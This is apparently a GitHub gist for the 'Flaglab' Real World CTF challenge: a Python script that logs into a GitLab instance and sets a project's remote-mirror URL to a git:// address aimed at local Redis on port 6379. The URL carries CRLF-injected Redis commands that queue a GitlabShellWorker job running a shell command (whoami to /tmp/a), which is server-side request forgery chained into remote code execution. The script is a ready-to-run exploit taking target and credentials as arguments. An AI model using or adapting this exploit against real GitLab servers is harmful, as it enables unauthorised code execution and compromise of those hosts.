Skip to content

Instantly share code, notes, and snippets.

@hub2
Created January 4, 2019 18:57
Show Gist options
  • Save hub2/4f4def586d58f93cc78b8c4ffccc18f3 to your computer and use it in GitHub Desktop.
Save hub2/4f4def586d58f93cc78b8c4ffccc18f3 to your computer and use it in GitHub Desktop.
Flaglab Real World CTF
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time
s = requests.Session()
def get_csrf_token(html):
soup = BeautifulSoup(html)
auth_token = soup.find("input", {"name": "authenticity_token"})
return auth_token["value"]
def login(username, password):
response = s.get(urljoin(target, '/users/sign_in'))
token = get_csrf_token(response.text)
data = {
'user[login]': username,
'user[password]': password,
'authenticity_token': token
}
response = s.post(urljoin(target, '/users/sign_in'), data=data)
assert(response.status_code == 200)
def execute_payload(username, project, payload):
namespace = username
response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository'])))
token = get_csrf_token(response.text)
url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n'
data = {
'_method': 'patch',
'project[remote_mirrors_attributes][0][enabled]': '1',
'project[remote_mirrors_attributes][0][only_protected_branches]': 'true',
'project[remote_mirrors_attributes][0][uri]': url,
'uri': url,
'authenticity_token': token,
'auth_metod': '',
'password': ''
}
response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data)
data = {
'_method': 'post',
'authenticity_token': token
}
response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data)
if __name__ == '__main__':
if len(sys.argv) != 5:
print("python3 exploit.py target username password projectname")
sys.exit(1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
projectname = sys.argv[4]
jid = ''.join(random.choice('0123456789abcdeg') for n in range(24))
payload = """
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
exec
exec
""" % jid
login(username, password)
execute_payload(username, projectname, payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment